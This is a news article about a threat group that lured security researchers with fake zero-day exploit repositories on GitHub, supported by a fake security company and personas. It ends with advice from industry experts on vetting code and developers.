An unknown threat group recently carried out a sophisticated attack on security researchers, creating a malicious GitHub repository that claimed to contain a zero-day exploit for a vulnerability in the Signal messaging app. This attack stands out because of the significant effort the attackers put into creating a fake security company and establishing a social presence to support their deception. The research conducted by threat intelligence firm VulnCheck reveals that the group went to great lengths to build realistic personas and profiles for these fake security researchers.
According to William Vu, a security researcher at VulnCheck, the amount of time and effort invested in constructing this fake security company is unprecedented. “They put in a decent amount of effort into building personas, if you will, for each of these characters…So they put a lot of time and effort into building, really, a fake security company, and that, to me, is kind of new,” Vu tells Dark Reading.
While targeting security researchers is relatively rare, it is not entirely unheard of. Back in 2021, Google’s Threat Analysis Group (TAG) discovered that North Korea-backed hackers had created a faux research blog and multiple fake Twitter profiles to deceive security researchers into collaborating on vulnerability research. Those who accepted the collaboration offer would receive a Visual Studio project file that contained custom malware designed to infect their systems. In a similar vein, North Korean hackers used LinkedIn accounts and posed as recruiters to target security researchers, as revealed in research released by Mandiant in March.
The recent attack also employed social engineering tactics to target the software supply chain. As Mike Parkin, a senior technical engineer at Vulcan Cyber, explains, one of the primary defenses against malicious packages is for developers to carefully vet the source of the package before downloading and using it. If threat actors can convincingly fake the source’s trustworthiness, they have a better chance of tricking victims into downloading their package without conducting a thorough inspection.
VulnCheck took action and notified GitHub about the fake exploit repository, leading to its removal. However, the attackers quickly recreated a similar page advertising a zero-day exploit for WhatsApp. This pattern continued, with VulnCheck repeatedly notifying GitHub of the new pages, resulting in their removal, only for the attackers to create new project pages. The malicious repositories offered exploits for various software, including Microsoft Exchange and Discord.
Instead of containing an actual exploit, each repository housed a Python file that, if run by the target, downloaded a binary specific to their operating system. While most antivirus programs detected the Windows malware, only a small number of Linux host-based scanners were able to identify the binary. The threat actor utilized multiple social media profiles to circulate links to the fake exploit repositories.
VulnCheck researcher William Vu believes that this attack is intended to gain access to security professionals’ research and valuable intellectual property. By targeting security researchers, the threat actors aim to obtain real zero-day exploits and any corporate IP that these researchers may have access to.
The attack serves as a reminder that both companies and researchers need to exercise caution when dealing with online code and unfamiliar developers. Erich Kron, a security awareness advocate at KnowBe4, emphasizes the importance of educating developers about the risks associated with online code and how to properly vet projects and developers. Similarly, security researchers should exercise due diligence when examining code, especially when it appears on open platforms like GitHub. Conducting some background research on the company and individuals involved can help identify potential red flags.
While the recent attack highlights the need for increased awareness and vigilance, it is worth noting that established researchers with a track record can more easily spot suspicious activity. However, newly active researchers may need to be more cautious until they build a history and reputation in the industry. By remaining cautious and conducting thorough investigations, both companies and researchers can mitigate the risks associated with such attacks.